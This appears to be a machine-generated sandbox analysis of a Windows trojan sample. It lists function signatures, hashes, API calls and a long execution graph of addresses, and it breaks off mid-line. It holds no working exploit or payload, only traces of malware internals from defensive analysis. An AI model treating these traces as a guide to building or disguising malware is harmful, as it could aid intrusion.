                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
                                                                                                                                                                                                  • API String ID: 3307058713-2305613483
                                                                                                                                                                                                  • Opcode ID: c2ebe96ac8faf4276af3ce06e6d9ff64cda5e4469a403ac2682072991903c64b
                                                                                                                                                                                                  • Instruction ID: e7cace1b2abb4a53e6f67be6d25c94777922f41b215c15862cb3f71d6ec5cf75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2ebe96ac8faf4276af3ce06e6d9ff64cda5e4469a403ac2682072991903c64b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49418E3AA0CA12C5EB14BF35A4400B9B795FB45FD4F944035E94E43BA5EE3EE891C721
                                                                                                                                                                                                  Function 00007FF745020C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                  • Opcode ID: 63b75e8a8e85f5ae143d55bde05ee26fc9721e6168c3b8222b6e4c0b22b80d3a
                                                                                                                                                                                                  • Instruction ID: 100fc9f220d2bcc8157cd97910a20b9d3ad2a55ca0a60bdf7137c62520e68321
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63b75e8a8e85f5ae143d55bde05ee26fc9721e6168c3b8222b6e4c0b22b80d3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF41C376A1DB81C6D710AF35E4147A9A7A0FB48B84F844031EE8D87768DF3CD801C750
                                                                                                                                                                                                  Function 00007FF7450155D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF74500118F), ref: 00007FF745015620
                                                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF74500118F), ref: 00007FF745015661
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                  • Opcode ID: 7c0ec16579065a6e2efc5c2d2e86b05edcbea124611f0f2d2bb5e1406ba378fe
                                                                                                                                                                                                  • Instruction ID: 80f487133c8d87c9a887cbccdb106d4391a5a1e2645faab57fb4dd46c487d030
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c0ec16579065a6e2efc5c2d2e86b05edcbea124611f0f2d2bb5e1406ba378fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B311213661CB4182EB519B25E440269B7E5FB88F84F584235EE8D0B768EF3DD5518B40

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:3.8%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:9.5%
                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                  Total number of Limit Nodes:65
                                                                                                                                                                                                  execution_graph 92809 7ff6cf9b60dc 92814 7ff6cf9b8440 92809->92814 92811 7ff6cf9b60e5 92813 7ff6cf9b6102 __vcrt_uninitialize_ptd 92811->92813 92818 7ff6cf9b5ff0 92811->92818 92815 7ff6cf9b8451 92814->92815 92816 7ff6cf9b8455 92814->92816 92815->92811 92816->92815 92827 7ff6cf9b7c20 92816->92827 92819 7ff6cf9b6039 GetLastError 92818->92819 92824 7ff6cf9b600f _Strcoll 92818->92824 92820 7ff6cf9b604c 92819->92820 92822 7ff6cf9b606a SetLastError 92820->92822 92823 7ff6cf9b6067 92820->92823 92838 7ff6cf9b5e70 13 API calls 3 library calls 92820->92838 92821 7ff6cf9b6034 92821->92813 92822->92821 92823->92822 92824->92821 92837 7ff6cf9b5e70 13 API calls 3 library calls 92824->92837 92828 7ff6cf9b7d10 92827->92828 92836 7ff6cf9b2040 EnterCriticalSection 92828->92836 92837->92821 92838->92823 92839 7ff8b7e6c0b0 92840 7ff8b7e6c0f1 92839->92840 92842 7ff8b7e6c0e6 92839->92842 92845 7ff8b7e6c0fb 92840->92845 92870 7ff8b7e6dd20 21 API calls 92840->92870 92904 7ff8b7ec9e10 92842->92904 92845->92842 92853 7ff8b7e6d570 92845->92853 92851 7ff8b7e6c1a2 92851->92842 92885 7ff8b7e74bb0 92851->92885 92855 7ff8b7e6d5d0 92853->92855 92858 7ff8b7e6d709 WSASetLastError 92855->92858 92860 7ff8b7e6dcbc 92855->92860 92861 7ff8b7e6db9c 92855->92861 92864 7ff8b7e6c13a 92855->92864 92868 7ff8b7e6d0d0 21 API calls 92855->92868 92869 7ff8b7e74bb0 14 API calls 92855->92869 92913 7ff8b7eb3b60 92855->92913 92916 7ff8b7e74b60 92855->92916 92920 7ff8b7e974f0 20 API calls 92855->92920 92856 7ff8b7e74bb0 14 API calls 92857 7ff8b7e6dbc3 92856->92857 92859 7ff8b7e74bb0 14 API calls 92857->92859 92865 7ff8b7e6dc0d 92857->92865 92858->92855 92859->92857 92922 7ff8b7e74a70 14 API calls 92860->92922 92861->92856 92861->92864 92864->92842 92871 7ff8b7e6d280 92864->92871 92921 7ff8b7e74a70 14 API calls 92865->92921 92868->92855 92869->92855 92870->92845 92872 7ff8b7e6d2a4 92871->92872 92878 7ff8b7e6d2bd 92871->92878 92873 7ff8b7e6d2b4 free 92872->92873 92924 7ff8b7e688f0 free 92872->92924 92873->92878 92874 7ff8b7e6c17b 92874->92851 92882 7ff8b7e9ef80 92874->92882 92875 7ff8b7e6d2e7 92875->92874 92879 7ff8b7e6d306 free 92875->92879 92926 7ff8b7e688f0 free 92875->92926 92877 7ff8b7e6d2de free 92877->92875 92878->92875 92878->92877 92925 7ff8b7e688f0 free 92878->92925 92879->92874 92883 7ff8b7eb3b60 2 API calls 92882->92883 92884 7ff8b7e9efa3 92883->92884 92884->92851 92886 7ff8b7e74d03 92885->92886 92889 7ff8b7e74bb9 92885->92889 92886->92842 92887 7ff8b7e74cf3 92888 7ff8b7ec9e10 8 API calls 92887->92888 92888->92886 92889->92887 92890 7ff8b7e74c50 92889->92890 92927 7ff8b7e94eb0 92889->92927 92892 7ff8b7e74c83 92890->92892 92893 7ff8b7e74c71 92890->92893 92894 7ff8b7e94eb0 8 API calls 92892->92894 92895 7ff8b7e94eb0 8 API calls 92893->92895 92896 7ff8b7e74c81 92894->92896 92895->92896 92930 7ff8b7e95060 8 API calls 92896->92930 92898 7ff8b7e74cb7 92899 7ff8b7e74cde 92898->92899 92900 7ff8b7e74d0d 92898->92900 92931 7ff8b7e74980 fwrite fwrite 92899->92931 92932 7ff8b7ec9f38 8 API calls 92900->92932 92903 7ff8b7e74d12 92905 7ff8b7ec9e19 92904->92905 92906 7ff8b7e6c253 92905->92906 92907 7ff8b7ec9e64 IsProcessorFeaturePresent 92905->92907 92908 7ff8b7ec9e7c 92907->92908 92934 7ff8b7eca05c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 92908->92934 92910 7ff8b7ec9e8f 92935 7ff8b7ec9e30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 92910->92935 92914 7ff8b7eb3b72 QueryPerformanceCounter 92913->92914 92915 7ff8b7eb3bad GetTickCount 92913->92915 92914->92855 92915->92855 92917 7ff8b7e74ba0 92916->92917 92918 7ff8b7e74b65 92916->92918 92917->92855 92918->92917 92923 7ff8b7e74eb0 18 API calls 92918->92923 92920->92855 92921->92864 92922->92864 92923->92917 92924->92873 92925->92877 92926->92879 92933 7ff8b7e950f0 8 API calls 92927->92933 92929 7ff8b7e94ee3 92929->92890 92930->92898 92931->92887 92932->92903 92933->92929 92934->92910 92936 7ff8b7e6c530 92937 7ff8b7e6c557 92936->92937 92946 7ff8b7e6c569 92936->92946 92938 7ff8b7e6c5f3 92943 7ff8b7e74bb0 14 API calls 92938->92943 92939 7ff8b7e6c621 calloc 92942 7ff8b7e6c8a6 92939->92942 92949 7ff8b7e6c646 92939->92949 92940 7ff8b7e6c608 92945 7ff8b7e6c8ab free free 92942->92945 92943->92940 92945->92940 92946->92938 92946->92939 92946->92940 92948 7ff8b7e6c8cc 92946->92948 92946->92949 92955 7ff8b7eabb90 calloc 92946->92955 92956 7ff8b7ec4270 6 API calls 92946->92956 92959 7ff8b7ec41c0 6 API calls 92946->92959 92960 7ff8b7e74a70 14 API calls 92948->92960 92949->92940 92949->92945 92949->92946 92954 7ff8b7e68360 calloc 92949->92954 92957 7ff8b7e8e8b0 calloc calloc free 92949->92957 92958 7ff8b7e64da0 calloc free calloc free 92949->92958 92954->92949 92955->92946 92956->92946 92957->92949 92958->92949 92959->92946 92960->92940 92961 7ff8b7e99fa1 92996 7ff8b7eb4360 92961->92996 92964 7ff8b7e9a07e 92967 7ff8b7e6cfb0 10 API calls 92964->92967 92988 7ff8b7e99ee0 92964->92988 92965 7ff8b7e9ef80 2 API calls 92966 7ff8b7e99fd4 92965->92966 92968 7ff8b7e9ef80 2 API calls 92966->92968 92967->92988 92971 7ff8b7e99fe7 92968->92971 92969 7ff8b7e9b0e4 92972 7ff8b7e9a01e 92971->92972 92973 7ff8b7eb3b60 2 API calls 92971->92973 92974 7ff8b7e9a04f 92972->92974 92977 7ff8b7eb3b60 2 API calls 92972->92977 92976 7ff8b7e9a000 92973->92976 93043 7ff8b7eb5b80 92974->93043 93066 7ff8b7e97650 18 API calls 92976->93066 92980 7ff8b7e9a031 92977->92980 93067 7ff8b7e97650 18 API calls 92980->93067 92983 7ff8b7e99840 20 API calls 92983->92988 92984 7ff8b7e74a70 14 API calls 92984->92988 92986 7ff8b7e9ba90 free free 92986->92988 92988->92969 92988->92983 92988->92984 92988->92986 93060 7ff8b7e6cfb0 92988->93060 93070 7ff8b7e998c0 92988->93070 93083 7ff8b7e6a330 92988->93083 93102 7ff8b7e9f410 QueryPerformanceCounter GetTickCount 92988->93102 93103 7ff8b7e97540 18 API calls 92988->93103 93104 7ff8b7e9f2d0 17 API calls 92988->93104 92989 7ff8b7e9a0d4 92989->92964 92992 7ff8b7e9ef80 2 API calls 92989->92992 92991 7ff8b7e9a076 92991->92964 92991->92989 93068 7ff8b7e99840 20 API calls 92991->93068 92994 7ff8b7e9a0ef 92992->92994 92994->92964 93069 7ff8b7e99840 20 API calls 92994->93069 92997 7ff8b7eb4383 92996->92997 92998 7ff8b7eb43e7 92997->92998 92999 7ff8b7eb43b0 92997->92999 93000 7ff8b7eb4397 free 92997->93000 93106 7ff8b7e74a70 14 API calls 92998->93106 93002 7ff8b7eb4400 92999->93002 93005 7ff8b7eb43be free 92999->93005 93000->92999 93004 7ff8b7eb442b 93002->93004 93006 7ff8b7eb4412 93002->93006 93003 7ff8b7e99fa9 93003->92964 93003->92965 93108 7ff8b7ec5710 calloc 93004->93108 93105 7ff8b7eb9f80 8 API calls 93005->93105 93107 7ff8b7e74a70 14 API calls 93006->93107 93010 7ff8b7eb446f 93010->93003 93012 7ff8b7eb4479 free 93010->93012 93011 7ff8b7eb43e3 93011->92998 93011->93002 93015 7ff8b7eb44e5 93012->93015 93014 7ff8b7eb4559 93016 7ff8b7eb456a 93014->93016 93110 7ff8b7e84440 48 API calls 93014->93110 93109 7ff8b7e708d0 91 API calls 93015->93109 93111 7ff8b7e858b0 42 API calls 93016->93111 93019 7ff8b7eb4574 93020 7ff8b7eb4633 93019->93020 93112 7ff8b7e826c0 free free free free free 93019->93112 93021 7ff8b7eb4665 93020->93021 93022 7ff8b7eb463e free 93020->93022 93025 7ff8b7eb46da 93021->93025 93029 7ff8b7eb4671 93021->93029 93125 7ff8b7ea46d0 free _strdup 93021->93125 93115 7ff8b7e94d90 93022->93115 93129 7ff8b7e83340 free 93025->93129 93026 7ff8b7eb458b 93113 7ff8b7e9ee70 QueryPerformanceCounter GetTickCount 93026->93113 93029->93003 93030 7ff8b7eb468f 93030->93025 93126 7ff8b7ea46d0 free _strdup 93030->93126 93032 7ff8b7eb459b 93034 7ff8b7eb4620 93032->93034 93036 7ff8b7eb45c9 calloc 93032->93036 93037 7ff8b7eb45ec 93032->93037 93034->93029 93114 7ff8b7e85770 17 API calls 93034->93114 93035 7ff8b7eb46a8 93035->93025 93127 7ff8b7ea46d0 free _strdup 93035->93127 93036->93029 93036->93037 93037->93034 93040 7ff8b7eb45fe free free 93037->93040 93040->93034 93041 7ff8b7eb46c1 93041->93025 93128 7ff8b7ea46d0 free _strdup 93041->93128 93132 7ff8b7ea0160 free free 93043->93132 93047 7ff8b7eb5bbe 93048 7ff8b7eb5bdf 93047->93048 93049 7ff8b7e9ef80 2 API calls 93047->93049 93050 7ff8b7eb5c19 93047->93050 93048->92991 93052 7ff8b7eb5c09 93049->93052 93050->93048 93051 7ff8b7e6a330 298 API calls 93050->93051 93051->93048 93052->93050 93053 7ff8b7eb3b60 2 API calls 93052->93053 93054 7ff8b7eb5c29 93053->93054 93055 7ff8b7eb5c5c 93054->93055 93056 7ff8b7eb5c3c 93054->93056 93215 7ff8b7e833d0 93055->93215 93214 7ff8b7e6cb20 8 API calls 93056->93214 93059 7ff8b7eb5c56 93059->93050 93059->93055 93061 7ff8b7e6cfe0 93060->93061 93062 7ff8b7eb3b60 2 API calls 93061->93062 93064 7ff8b7e6cfe5 93061->93064 93062->93064 93063 7ff8b7ec9e10 8 API calls 93065 7ff8b7e6d0c0 93063->93065 93064->93063 93065->92988 93066->92972 93067->92974 93068->92989 93069->92964 93071 7ff8b7e998f2 93070->93071 93072 7ff8b7e998eb 93070->93072 93537 7ff8b7e626f0 93071->93537 93072->92988 93084 7ff8b7e6a339 93083->93084 93092 7ff8b7e6a46b 93083->93092 93085 7ff8b7e6a46d 93084->93085 93086 7ff8b7e6a427 93084->93086 93084->93092 93087 7ff8b7e74b60 18 API calls 93085->93087 93088 7ff8b7e74b60 18 API calls 93086->93088 93089 7ff8b7e6a47f 93087->93089 93090 7ff8b7e6a44e 93088->93090 93553 7ff8b7e6bae0 93089->93553 93544 7ff8b7e6b4c0 93090->93544 93092->92988 93095 7ff8b7e6a4aa 93571 7ff8b7e68c90 93095->93571 93099 7ff8b7e68c90 29 API calls 93100 7ff8b7e6a4c1 93099->93100 93575 7ff8b7eb5720 32 API calls 93100->93575 93102->92988 93103->92988 93104->92988 93105->93011 93106->93003 93107->93003 93108->93010 93109->93014 93110->93016 93111->93019 93112->93026 93113->93032 93114->93020 93116 7ff8b7e94dc6 93115->93116 93130 7ff8b7e950f0 8 API calls 93116->93130 93118 7ff8b7e94de2 93119 7ff8b7e94dfc 93118->93119 93120 7ff8b7e94dee 93118->93120 93123 7ff8b7e94e17 _strdup 93119->93123 93124 7ff8b7e94e06 93119->93124 93131 7ff8b7e77c70 free 93120->93131 93122 7ff8b7e94df3 93122->93021 93123->93021 93124->93021 93125->93030 93126->93035 93127->93041 93128->93025 93129->93029 93130->93118 93131->93122 93225 7ff8b7ea3920 93132->93225 93134 7ff8b7ea01b0 93235 7ff8b7e765c0 93134->93235 93136 7ff8b7ea01ca 93137 7ff8b7eb6b50 93136->93137 93138 7ff8b7eb6b9d 93137->93138 93212 7ff8b7eb6b93 93137->93212 93253 7ff8b7eb6910 calloc 93138->93253 93140 7ff8b7eb6ba2 93140->93212 93261 7ff8b7eb8670 93140->93261 93141 7ff8b7ec9e10 8 API calls 93143 7ff8b7eb74ce 93141->93143 93143->93047 93145 7ff8b7eb6bea 93146 7ff8b7eb6bd8 _strdup 93146->93145 93146->93212 93212->93141 93214->93059 93216 7ff8b7e83452 93215->93216 93217 7ff8b7e833e6 93215->93217 93216->93050 93217->93216 93218 7ff8b7e83407 93217->93218 93534 7ff8b7ea41d0 calloc free 93218->93534 93220 7ff8b7e83421 93220->93216 93226 7ff8b7ea3944 93225->93226 93227 7ff8b7ea3936 93225->93227 93247 7ff8b7e74d90 18 API calls 93226->93247 93246 7ff8b7e74d90 18 API calls 93227->93246 93230 7ff8b7ea3950 93248 7ff8b7ea4380 free 93230->93248 93232 7ff8b7ea3942 93233 7ff8b7ea399c 93232->93233 93234 7ff8b7ea3987 free 93232->93234 93233->93134 93234->93232 93234->93233 93236 7ff8b7e76691 93235->93236 93238 7ff8b7e765dd 93235->93238 93236->93136 93237 7ff8b7e76630 93237->93236 93251 7ff8b7e99180 459 API calls 93237->93251 93238->93236 93238->93237 93249 7ff8b7e99180 459 API calls 93238->93249 93241 7ff8b7e76626 93250 7ff8b7eb53c0 459 API calls 93241->93250 93243 7ff8b7e7667c 93252 7ff8b7eb53c0 459 API calls 93243->93252 93245 7ff8b7e76686 93245->93136 93246->93232 93247->93230 93248->93232 93249->93241 93250->93237 93251->93243 93252->93245 93254 7ff8b7eb6ab8 93253->93254 93255 7ff8b7eb6939 93253->93255 93254->93140 93256 7ff8b7eb3b60 2 API calls 93255->93256 93257 7ff8b7eb6998 93256->93257 93258 7ff8b7eb6a95 _strdup 93257->93258 93259 7ff8b7eb6ae9 93257->93259 93258->93259 93260 7ff8b7eb6aa7 free free 93258->93260 93259->93140 93260->93254 93262 7ff8b7eb868b 93261->93262 93263 7ff8b7eb86aa 93261->93263 93262->93263 93264 7ff8b7eb8694 93262->93264 93472 7ff8b7eb9110 19 API calls 93263->93472 93470 7ff8b7eb9110 19 API calls 93264->93470 93267 7ff8b7eb86b2 93473 7ff8b7e81840 calloc 93267->93473 93268 7ff8b7eb869c 93471 7ff8b7eb9e10 22 API calls 93268->93471 93271 7ff8b7eb86a8 93272 7ff8b7eb86b7 93271->93272 93276 7ff8b7eb873d 93272->93276 93277 7ff8b7e94d90 10 API calls 93272->93277 93284 7ff8b7eb6bc2 93272->93284 93273 7ff8b7eb881d 93276->93273 93278 7ff8b7eb87e2 93276->93278 93279 7ff8b7eb8792 93276->93279 93280 7ff8b7eb871b 93277->93280 93280->93276 93280->93284 93284->93145 93284->93146 93284->93212 93470->93268 93471->93271 93472->93267 93534->93220 93538 7ff8b7e62705 93537->93538 93539 7ff8b7e62720 93537->93539 93538->93539 93540 7ff8b7e62714 93538->93540 93543 7ff8b7e74930 WaitForSingleObjectEx CloseHandle 93540->93543 93542 7ff8b7e62719 93542->93539 93543->93542 93546 7ff8b7e6b4eb 93544->93546 93545 7ff8b7e6b690 93545->93092 93546->93545 93547 7ff8b7e6b9f0 259 API calls 93546->93547 93551 7ff8b7e6b511 93546->93551 93547->93551 93548 7ff8b7e6bae0 27 API calls 93548->93551 93550 7ff8b7e68c90 29 API calls 93550->93551 93551->93545 93551->93548 93551->93550 93576 7ff8b7eb5720 32 API calls 93551->93576 93577 7ff8b7e6be20 14 API calls 93551->93577 93555 7ff8b7e6baf9 93553->93555 93562 7ff8b7e6a495 93553->93562 93554 7ff8b7e6bb08 93579 7ff8b7e8e150 8 API calls 93554->93579 93555->93554 93578 7ff8b7e84ff0 free free 93555->93578 93562->93095 93563 7ff8b7e6b9f0 93562->93563 93564 7ff8b7e6bae0 27 API calls 93563->93564 93566 7ff8b7e6ba07 93564->93566 93565 7ff8b7e6ba10 93565->93095 93566->93565 93567 7ff8b7e6ba4e 93566->93567 93580 7ff8b7e69740 93566->93580 93569 7ff8b7e69740 232 API calls 93567->93569 93570 7ff8b7e6ba85 93567->93570 93569->93570 93570->93095 93572 7ff8b7e68cba 93571->93572 93573 7ff8b7e68cb1 93571->93573 93572->93099 93930 7ff8b7e655f0 93573->93930 93577->93551 93578->93554 93581 7ff8b7e69776 93580->93581 93593 7ff8b7e6978b 93580->93593 93583 7ff8b7eb3b60 2 API calls 93581->93583 93581->93593 93582 7ff8b7ec9e10 8 API calls 93584 7ff8b7e6979e 93582->93584 93585 7ff8b7e697bd 93583->93585 93584->93567 93586 7ff8b7e6982e 93585->93586 93587 7ff8b7e697da 93585->93587 93620 7ff8b7e6cf00 10 API calls 93586->93620 93619 7ff8b7e6ce40 10 API calls 93587->93619 93590 7ff8b7e69837 93591 7ff8b7e6983c 93590->93591 93594 7ff8b7e697e2 93590->93594 93621 7ff8b7e74a70 14 API calls 93591->93621 93593->93582 93594->93593 93595 7ff8b7e69866 93594->93595 93597 7ff8b7e69855 93594->93597 93598 7ff8b7e74bb0 14 API calls 93594->93598 93602 7ff8b7ec3cf0 93594->93602 93609 7ff8b7e65ce0 93594->93609 93596 7ff8b7e74bb0 14 API calls 93595->93596 93596->93593 93599 7ff8b7e74bb0 14 API calls 93597->93599 93598->93594 93599->93593 93603 7ff8b7ec3d17 93602->93603 93604 7ff8b7ec3dab 93602->93604 93622 7ff8b7ebfac0 93603->93622 93604->93594 93606 7ff8b7e74bb0 14 API calls 93607 7ff8b7ec3d5b 93606->93607 93607->93594 93610 7ff8b7e65d07 93609->93610 93615 7ff8b7e65d67 93609->93615 93612 7ff8b7e74bb0 14 API calls 93610->93612 93611 7ff8b7ec9e10 8 API calls 93613 7ff8b7e65d84 93611->93613 93614 7ff8b7e65d2c 93612->93614 93613->93594 93614->93615 93929 7ff8b7e9c2d0 ioctlsocket 93614->93929 93615->93611 93617 7ff8b7e65d48 93617->93615 93618 7ff8b7e65d4c recv 93617->93618 93618->93615 93619->93594 93620->93590 93621->93593 93623 7ff8b7ebfb15 93622->93623 93628 7ff8b7ebfb0c 93622->93628 93624 7ff8b7e74b60 18 API calls 93623->93624 93627 7ff8b7ebfb34 93623->93627 93624->93627 93625 7ff8b7ec9e10 8 API calls 93626 7ff8b7ebfbf6 93625->93626 93626->93606 93627->93628 93629 7ff8b7ebfbb1 93627->93629 93630 7ff8b7ebfc7e 93627->93630 93635 7ff8b7ebfc08 93627->93635 93628->93625 93679 7ff8b7eae4c0 GetLastError _errno 93629->93679 93630->93628 93642 7ff8b7ebf4f0 93630->93642 93635->93630 93638 7ff8b7ebfcff 93635->93638 93640 7ff8b7ebfccb 93635->93640 93638->93628 93638->93630 93639 7ff8b7e74b60 18 API calls 93638->93639 93639->93630 93640->93630 93641 7ff8b7e74b60 18 API calls 93640->93641 93641->93630 93643 7ff8b7ebf550 93642->93643 93646 7ff8b7ebf56a 93642->93646 93644 7ff8b7ebf556 93643->93644 93643->93646 93645 7ff8b7e74b60 18 API calls 93644->93645 93651 7ff8b7ebf565 93645->93651 93648 7ff8b7ebf5c2 realloc 93646->93648 93655 7ff8b7ebf651 93646->93655 93658 7ff8b7ebf5fe 93646->93658 93678 7ff8b7ebf571 93646->93678 93647 7ff8b7e74b60 18 API calls 93647->93651 93650 7ff8b7ebf5e2 93648->93650 93648->93658 93649 7ff8b7ebf8fd 93652 7ff8b7ebf9c8 memmove memmove 93649->93652 93656 7ff8b7ebf9fe 93649->93656 93699 7ff8b7e74a70 14 API calls 93650->93699 93651->93649 93716 7ff8b7ebc700 93651->93716 93652->93656 93655->93651 93666 7ff8b7ebf906 93655->93666 93667 7ff8b7ebf764 realloc 93655->93667 93670 7ff8b7ebf797 memmove 93655->93670 93671 7ff8b7ebf7cb memmove 93655->93671 93676 7ff8b7e74b60 18 API calls 93655->93676 93655->93678 93700 7ff8b7ec1420 93655->93700 93657 7ff8b7ec9e10 8 API calls 93656->93657 93658->93655 93661 7ff8b7ebf653 93658->93661 93662 7ff8b7ebf645 93658->93662 93665 7ff8b7e74b60 18 API calls 93661->93665 93664 7ff8b7e74b60 18 API calls 93662->93664 93664->93655 93665->93655 93668 7ff8b7ebf92d 93666->93668 93666->93678 93667->93655 93669 7ff8b7ebf95d 93667->93669 93672 7ff8b7eae4c0 17 API calls 93668->93672 93735 7ff8b7e74a70 14 API calls 93669->93735 93670->93655 93671->93655 93674 7ff8b7ebf93e 93672->93674 93676->93655 93678->93647 93680 7ff8b7eae507 93679->93680 93697 7ff8b7eae500 93679->93697 93684 7ff8b7eae9d1 93680->93684 93688 7ff8b7eae533 93680->93688 93681 7ff8b7ec9e10 8 API calls 93682 7ff8b7eaea3e 93681->93682 93698 7ff8b7e74a70 14 API calls 93682->93698 93686 7ff8b7e94eb0 8 API calls 93684->93686 93687 7ff8b7eae58d 93686->93687 93691 7ff8b7eae9fb _errno 93687->93691 93921 7ff8b7eaf5b0 93688->93921 93694 7ff8b7eaea17 GetLastError 93691->93694 93695 7ff8b7eaea0e _errno 93691->93695 93694->93697 93695->93694 93697->93681 93698->93628 93699->93651 93701 7ff8b7ec144e 93700->93701 93702 7ff8b7e6cfb0 10 API calls 93701->93702 93712 7ff8b7ec148e 93701->93712 93715 7ff8b7ec1457 93701->93715 93704 7ff8b7ec147a 93702->93704 93703 7ff8b7ec1516 93703->93715 93706 7ff8b7ec1552 93704->93706 93705 7ff8b7e6cfb0 10 API calls 93705->93712 93706->93715 93712->93703 93712->93705 93712->93706 93713 7ff8b7ec155c WSAGetLastError 93712->93713 93712->93715 93791 7ff8b7ea2690 93712->93791 93801 7ff8b7ec1a60 93712->93801 93715->93655 93717 7ff8b7ebc73f GetModuleHandleA GetProcAddress 93716->93717 93719 7ff8b7ebc76a 93716->93719 93717->93719 93718 7ff8b7ebc7c3 memset 93719->93718 93724 7ff8b7ebc79b 93719->93724 93735->93651 93922 7ff8b7eaf5de FormatMessageW 93921->93922 93927 7ff8b7eaf5d7 93921->93927 93923 7ff8b7eaf61e wcstombs 93922->93923 93924 7ff8b7eaf63f strchr 93922->93924 93926 7ff8b7eaf636 93923->93926 93924->93927 93925 7ff8b7ec9e10 8 API calls 93928 7ff8b7eae561 93925->93928 93926->93924 93927->93925 93929->93617 93931 7ff8b7e74bb0 14 API calls 93930->93931 93932 7ff8b7e65612 93931->93932 93939 7ff8b7e65b30 93932->93939 93935 7ff8b7e6563f 93935->93572 93940 7ff8b7e65b4a 93939->93940 93941 7ff8b7e6561d 93939->93941 93942 7ff8b7e65b70 93940->93942 93953 7ff8b7e688f0 free 93940->93953 93941->93935 93945 7ff8b7e6c8f0 93941->93945 93942->93941 93954 7ff8b7e688f0 free 93942->93954 93946 7ff8b7e74bb0 14 API calls 93945->93946 93947 7ff8b7e6c91b 93946->93947 93948 7ff8b7e65633 93947->93948 93955 7ff8b7ec3940 93947->93955 93952 7ff8b7e688f0 free 93948->93952 93952->93935 93953->93942 93954->93941 93961 7ff8b7ec5f80 93955->93961 93957 7ff8b7ec3966 93958 7ff8b7e6c937 93957->93958 93968 7ff8b7e6c270 93957->93968 93960 7ff8b7e688f0 free 93958->93960 93960->93948 93962 7ff8b7ec5ff1 93961->93962 93963 7ff8b7ec5f96 93961->93963 93962->93957 93977 7ff8b7ebfdd0 93963->93977 93965 7ff8b7ec5fb6 free 93966 7ff8b7ec5fbc free free 93965->93966 93966->93957 93969 7ff8b7e74bb0 14 API calls 93968->93969 93970 7ff8b7e6c29b 93969->93970 93971 7ff8b7e6d280 4 API calls 93970->93971 93972 7ff8b7e6c2a6 93971->93972 93973 7ff8b7e6c2cf 93972->93973 93990 